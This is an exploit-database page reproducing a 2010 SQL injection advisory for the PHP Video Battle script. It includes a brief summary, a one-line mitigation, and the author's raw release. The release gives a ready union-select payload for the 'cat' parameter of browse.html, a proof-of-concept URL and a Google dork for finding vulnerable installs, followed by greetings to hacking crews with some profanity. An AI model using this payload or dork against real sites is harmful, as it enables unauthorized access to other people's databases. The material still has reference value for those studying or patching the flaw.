PHP Video Battle SQL Injection Vulnerability

vendor:

PHP Video Battle

by:

v3n0m

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP Video Battle

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

PHP Video Battle SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. The crafted query can be sent via the 'cat' parameter in the 'browse.html' page. For example, sending the following payload will reveal the version of the database: -9999+union+all+select+1,2,version(),4,5,6--

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
            PHP Video Battle SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: April, 29-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: PHP Video Battle
Vendor  	: http://www.rocky.nu/
Price		: $40.00 USD
Google Dork	: © 1998 - 2010 Video Battle Script
Overview	:

Battle of the best youtube videos! 2 videos side by side, choose which 
is the best. Members can join and submit youtube video links.
Very easy to customize HTML system.
----------------------------------------------------------------

Exploit:
~~~~~~~

-9999+union+all+select+1,2,version(),4,5,6--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/browse.html?cat=[SQLi]
http://127.0.0.1/[path]/browse.html?cat=-9999+union+all+select+1,2,version(),4,5,6--
----------------------------------------------------------------

Shoutz:
~~~~

- 'malingsial banyak cakap, you skill off bullshit on '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (baru tau gw ur klo lo ternyata pernah curhat sambil nangis² bruakakaka)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- Chip D3 Bi0s & LatinHackTeam (Good Job & Good Research Brotha ;)
- elicha cristia [ luv You...luv You...luv You... :) ]
- N.O.C & Technical Support @office "except ahong (fuck you off)"
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: http://yogyacarderlink.web.id/
	  http://v3n0m.blogdetik.com/
	  http://elich4.blogspot.com/ << Update donk >_<

---------------------------[EOF]--------------------------------